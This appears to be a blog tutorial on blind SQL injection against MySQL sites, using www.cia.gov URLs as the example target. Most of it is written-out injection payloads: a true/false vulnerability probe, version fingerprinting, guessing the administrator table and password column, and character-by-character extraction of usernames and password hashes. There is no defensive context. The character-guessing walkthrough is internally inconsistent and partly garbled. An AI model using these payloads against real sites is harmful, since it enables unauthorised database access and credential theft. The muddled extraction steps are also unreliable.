because this is a whole different story.
1. test for vulnerability
so you have a site lets say :
Code:
www.cia.gov/news.php?id=1
just like normal mysql injection
but for blind you put
Code:if you see any text from the page missing
www.cia.gov/news.php?id=1 and 1=2
or an error message like invalid id or db_error select * from xxxx@localhost call line "/" or anything like that
then its vuln
this works
because 1=2 is always false
you see if it was
Code:
www.cia.gov/index.php?id=1 and 1=1
then you would get the normal page
because 1=1 is always true
2. mysql version
to find mysql version you need to do this query
Code:if the pages comes back true then the version is 4
www.cia.gov/index.php?id=1 and substring(@@version,1,1)=4
if not then try
Code:if it comes back true then its a version 5
www.cia.gov/index.php?id=1 and substring(@@version,1,1)=5
3. fuzzing tables and columns
to find the table name you need to guess it
so...
here is the query
Code:i have guessed the table admin if the page loads true then the table exists
www.cia.gov/news.php?id=1 and (SELECT 1 from admin limit 0,1)=1
eg. the table name is administrator
and we try
Code:then it will return with an error a.k.a. false
(SELECT 1 from users limit 0,1)=1
but if we did
Code:
(SELECT 1 from administrator limit 0,1)=1
then it would not error a.k.a. true
now for the column
so the table is administrator
and we found that by fuzzing
now we need the column name
we fuzz it by
Code:if the column password exists then it wont error
www.cia.gov/news.php?id=1 and (SELECT substring(concat(1,password),1,1) from administrator limit 0,1)=1
you get my drift...
4. extracting password with ascii
so now we have the table/column we need to extract
well as you know it wont just pop up on the screen
we will need to use the ancii char
Code:if this returns true then you need to go higher
www.cia.gov/news.php?id=1 and ascii(substring((SELECT concat(username,0x3a,password) from administrator where userid=2),1,1))>99
Code:if this errors then its not greater than 103 and greater than/or 99
news.php?id=1 and ascii(substring((SELECT concat(username,0x3a,password) from users where userid=2),1,1))>103
now try
Code:no error then its greater than 99 and not greater than 103
news.php?id=1 and ascii(substring((SELECT concat(username,0x3a,password) from users where userid=2),1,1))>100
higher
Code:so its greater than 99 but not greater than 101
news.php?id=1 and ascii(substring((SELECT concat(username,0x3a,password) from users where userid=2),1,1))>101
error
higher
Code:so its greater than 99 but not greater than 100 making it 100
news.php?id=1 and ascii(substring((SELECT concat(username,0x3a,password) from users where userid=2),1,1))>100
error
the first character of the password is 100 which if u put into an ascii converter you will see
that it is the letter d
now you need to find the next character
Code:notice how i did where userid=1),2,1))>60 instead of 1,1
news.php?id=1 and ascii(substring((SELECT concat(username,0x3a,password) from users where userid=2),2,1))>60
so this will be doing the second character
so keep extracting characters untill u get an error
then u will have the hash / password.
0 comments:
Post a Comment